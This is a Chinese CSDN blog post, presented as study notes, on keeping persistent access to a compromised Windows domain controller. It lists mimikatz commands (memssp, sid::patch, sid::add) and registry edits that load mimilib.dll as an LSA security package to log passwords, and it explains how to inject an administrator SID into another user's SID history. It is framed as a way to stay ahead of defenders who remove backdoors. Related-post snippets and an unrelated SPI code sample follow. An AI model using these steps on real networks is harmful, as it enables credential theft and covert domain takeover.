1、权限维持&域控后门&SSP

已于 2024-02-26 15:56:15 修改
阅读量955 收藏 11
点赞数 14
CC 4.0 BY-SA版权
分类专栏: 权限维持 文章标签: 权限维持 网络安全
于 2024-02-25 22:51:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65842464/article/details/136284879
本文介绍了如何在获得域控主机权限后,通过SSP临时或永久加载DLL来维持权限,以及利用SID-history修改用户属性,确保长期控制服务器。方法包括使用mimikatz执行命令、修改注册表设置和添加SID历史记录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

用途:个人学习笔记,有所借鉴,欢迎指正!                               

个人微信

目录

前言:

一、基于验证DLL加载—SSP

1、方法一:临时生效(未重启情况生效)

(1)、 执行相关命令

(2)、等待域控管理员重新登录或切换用户

2、方法二:永久生效(重启后生效)

(1)、 上传特殊的dll文件

(2)、执行相关命令

(3)、等待服务器重启生效

3、总结

二、 基于用户属性修改—SID-history

 1、获取所有用户的SID值

 2、获取某个用户SID值

3、赋予某用户administrator权限 

前言:

很多时候拿下了一台服务器权限后,可能过几天就会无法控制,因为企业都会有专业人士定期查杀后门、杀毒检测、漏洞修复等,所以可能很快就会失去控制权限,而权限维持的目的是保证自己的权限不会掉,一直能够控制目标服务器。

以下是基于得到域控主机权限的情况下进行权限维持:

一、基于验证DLL加载—SSP

SSP—Security Support Provider,直译为安全支持提供者,又名 Security Package。简单的理解为 SSP 就是一个 DLL,用来实现身份认证,并且维持系统权限。 

1、方法一:临时生效(未重启情况生效)

(1)、 执行相关命令

 这里可以使用mimikatz进行命令执行,该命令是一次性的,所谓的一次性就是当这台服务器重启后,那么这条命令就无法再次执行了,相当于重启即失效。

privilege::debug
misc::memssp

(2)、等待域控管理员重新登录或切换用户

当管理员重新登录或切换用户后,可以看到在下述的文件路径中获取到了登陆的账号密码。

C:\Windows\System32\mimilsa.log   ##文件位置。

2、方法二:永久生效(重启后生效)

这个操作需要修改注册表的值,可远程登录目标服务器执行相关命令,也可在CS中执行命令

(1)、 上传特殊的dll文件

mimikatz中的mimilib.dll上传到域控的C:\windows\system32\目录下。

(2)、执行相关命令
#查看当前注册表中的设置值
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
#修改注册表中的值
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

#CS中修改注册表中的值
shell echo yes | reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
(3)、等待服务器重启生效

上述命令执行完后会在注册表中添加一个mimilib也就是会调用mimilib.dll,要注意在mimilib.dll前面有一个\0是换行。并且在重启后会在C:\windows\system32\kiwissp.log记录账号密码。

3、总结

两种方法都是盗取身份认证文件,便于长久访问的权限维持,第一种方法重启后失效,第二种方法重启后才生效,各有各的好处,所以可以配合使用。

二、 基于用户属性修改—SID-history

        SID即安全标识符(Security Identifiers),是标识用户、组和计算机帐户的唯一的号码。在第一次创建该帐户时,将给网络上的每一个帐户发布一个唯一的 SID。

        SIDHistory属性的存在是为了解决用户在迁移到另一个域中的时候权限会改变的问题。例如用户zhangsan在A域中本来是管理员,迁移到B域的时候因为sid的改变有可能会变成普通用户权限,这时候如果给zhangsan用户添加一个值为zhangsan在A域中的SID的SIDHistory值就可以解决这个问题,只有域管有更改SIDHistory的权利。

原理:这个手法就是将域控管理员的SID加入到域内一些恶意用户或者权限低的用户的SID history中,这样域内账户就可以用户域管权限去访问域控了,只要不修改域账号则可以一直访问。

 1、获取所有用户的SID值

 通过获取SID可以看到只有最后的四位值不同,其实这里也就是代表不同的权限。 

shell wmic useraccount get name,sid

 2、获取某个用户SID值

powershell Import-Module ActiveDirectory
powershell Get-ADUser webadmin -Properties sidhistory

3、赋予某用户administrator权限 

privilege::debug
sid::patch
sid::add /sam:dbadmin /new:administrator

参考:

windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey_windows操作系统安全防护强制性要求内容-CSDN博客

个人公众号:我心似阳

内网渗透-域内权限维持
lza20001103的博客
10-01 1206
域内权限维持 文章目录域内权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网权限维持 —— 后门
战神/calmness的博客
12-09 1328
目录 操作系统后门 粘滞键 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 制器权限持久化 DSRM 后门 SSP 维持权限 SID History 后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
域内权限维持思路总结
技术超强的网络安全平台
12-06 797
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind
141-权限维持&后门&SSP&HOOK&DSRM&SID&万能钥匙
dreamer292的博客
08-24 1036
权限维持相关知识点
权限维持
wuxinweii的博客
12-01 3951
DSRM后门: 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。活动目录安装后,安装向导提示管理员选择一个DSRM密码。有了密码,管理员可以防护数据库后门,避免之后出问题。但是它不提供访问或任何服务。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。 在渗透测试中,可以使用DSRM对环境进行持久化操作。适用版本为windows serv
域内权限维持
weixin_43047908的博客
06-04 820
目录Windows 操作系统常见持久性后门Windows系统隐藏账户 当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。 Windows 操作系统常见持久性后门 几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划
第8章权限维持分析及防御
willow_liang的博客
12-30 2161
第8章权限维持分析及防御 后门是一个留在目标主机上的软件,它可以使攻击者随时与目标主机进行连接。在大多数情况下,后门是一个运行在目标主机上的隐藏进程。因为后门可能允许一个普通的授权的用户制计算机,所以攻击者经常使用后门制服务器。攻击者在提升权限之后,往往会通过建立后门维持对目标主机的制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续制目标系统。因此如果我们能够了解攻击者在系统中建立后门的方法和思路,就可以在发现系统被人侵后快速找到攻击者留下的后门并将其清除。 .
内网后渗透攻击过程(实验环境)--4、权限维持(3)
最新发布
hj06112的博客
07-27 1328
内网渗透之制器维权技术
操作系统权限维持
hackzkaq的博客
10-12 1027
配套练手靶场,全套安全课程及工具 ,搜索公众号:白帽子左一 WINDOWS 一、操作系统权限维持 SharPersist 用 C# 编写的 Windows 持久性工具包。下载链接: https://github.com/fireeye/SharPersist/releases 功能 补充 keepass:一款管理密码的软件 启动文件夹 Windows系统都有一个“启动”文件夹,把需要打开的程序的快捷方式放到“启动”文件夹里,就可以实现开机自动启动。 如果想要实现应用程序在所有的用户登录系统后都能自动启动
权限维持-DSRM
whojoe的博客
05-17 761
权限维持-DSRM简介更改DSRM密码的方式通过明文指定通过账户同步DSRM利用使用DSRM账户连接的前提使用psexec或者wmiexec进行链接参考文章 简介 除了krbtgt服务帐号外,上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdmin
权限维持(重置DSRM密码与AdminSDHolder滥用)
qq_18811919的博客
03-25 1084
本篇文章讲解域内常见的权限维持手法的两种重置DSRM密码与AdminSDHolder滥用, 当然利用的姿势还有很多这里只是讲解了几种工具,下面我将写权限维持ACL滥用的 相关文章欢迎大家的支持。
权限维持(DCShadow)
qq_18811919的博客
03-21 476
本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用, DCShadow是一种常见的维持手段是通过伪造成恶意DC进行, 同步进行进而权限维持
windows权限维持SSP&HOOK&DSRM&SIDhistory&SkeletonKey
剁椒鱼头没剁椒的博客
08-15 1890
在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行,那就不用管,而且一些大型的企业,都会有固定的管理人员,对相应的服务器进行定期的杀毒,检查,那么如果中木马了,快点的可能几个小时就会被发现,慢点的也就几天。
权限维持】-非约束委派&约束委派
qq_41617902的博客
02-14 620
的非约束委派&约束委派利用
内网渗透(七十二)之权限维持之伪造
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-14 852
2022年110日,国外安全研究员Kaido发文称发现了一种新的伪造方式,安全研究员只需要新建一个机器账户,然后修改机器账户的UserAccountControl属性为8192。活动目录就会认为这个机器账户就是,然后就可以使用这个新建的机器账户进行DCSync操作了。由于修改机器账户的UserAccountControl属性需要域内权限,因此这种方式可以用来进行权限维持。这种权限维持方式与DCShadow类似,都是在域内伪造
权限持久化之AdminSDHolder权限维持
谢公子的博客
10-13 1415
SDProp与AdminSDHolder 受保护对象(通常是一些特权内置账号如Domain Admins、Enterprise Admins等)被系统安全策略保护,以避免这些特权对象被恶意修改或滥用(防止被删除、修改权限等)。每一个被保护的对象由SDProp进程(Security Descriptor Propagation)监保护,SDProp进程每60分钟运行一次,运行时检查受保护对象的安全描述符,检查将依照AdminSDHolder容器的ACL,如果受保护对象的ACL配置与AdminSDHolde
内网渗透之——渗透里常用的权限维持方法
wsnbbz的博客
04-03 2788
前言 在我们拿到账号密码后,为了防止密码被改,需要使用权限维持维持我们取得的权限 具体账号密码获取方法点此跳转 票据验证流程 1.首先将明文密码发送给AS服务器,AS服务器给我们一个TGT 2.拿着TGT去访问TGS服务器,TGS服务器给我们一个ST 3.使用获取到的ST访问对应的服务 权限维持-黄金票据 介绍 ms14068的漏洞原理是伪造管的TGT,而黄金票...
c svchost 服务 dll_Window权限维持(八):时间服务器
weixin_33873965的博客
01-18 220
Windows操作系统正在利用时间提供者体系结构,以便从网络中的其他网络设备或客户端获取准确的时间戳。时间提供者以DLL文件的形式实现,该文件位于System32文件夹中。Windows启动期间将启动服务W32Time并加载w32time.dll。DLL加载是一种已知的技术,通常使红队攻击者有机会执行任意代码。由于关联的服务会在Windows启动期间自动启动,因此可以将其用作持久性机制。但是,此方...
LPC1700系列ssp1用作spi源码
07-27
你可以使用LPC1700系列的SSP1模块作为SPI(串行外设接口)的源码。以下是一个简单的示例代码,展示了如何初始化SSP1并发送/接收数据。 ```c #include <lpc17xx.h> // SSP1初始化函数 void SSP1_Init(void) { // 使能SSP1模块的时钟 LPC_SC->PCONP |= (1 << 10); // 配置P0.7作为SCK1引脚 LPC_PINCON->PINSEL0 |= (2 << 14); // 配置P0.8作为MISO1引脚 LPC_PINCON->PINSEL0 |= (2 << 16); // 配置P0.9作为MOSI1引脚 LPC_PINCON->PINSEL0 |= (2 << 18); // 将SSP1设置为主模式 LPC_SSP1->CR1 |= (1 << 2); // 设置时钟分频系数为8,即SPI时钟频率为PCLK / 8 LPC_SSP1->CPSR = 8; // 使能SSP1模块 LPC_SSP1->CR1 |= (1 << 1); } // 发送数据函数 void SSP1_Send(uint16_t data) { // 等待发送缓冲区为空 while (LPC_SSP1->SR & (1 << 1)); // 将数据写入发送缓冲区 LPC_SSP1->DR = data; } // 接收数据函数 uint16_t SSP1_Receive(void) { // 等待接收缓冲区非空 while (!(LPC_SSP1->SR & (1 << 2))); // 从接收缓冲区读取数据 return LPC_SSP1->DR; } int main() { // 初始化SSP1 SSP1_Init(); // 发送数据 SSP1_Send(0x55); // 接收数据 uint16_t receivedData = SSP1_Receive(); // 处理接收到的数据 while (1) { // 主循环 } } ``` 这是一个简单的示例代码,用于初始化LPC1700系列的SSP1模块,并通过SPI发送和接收数据。你可以根据自己的需求进行修改和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值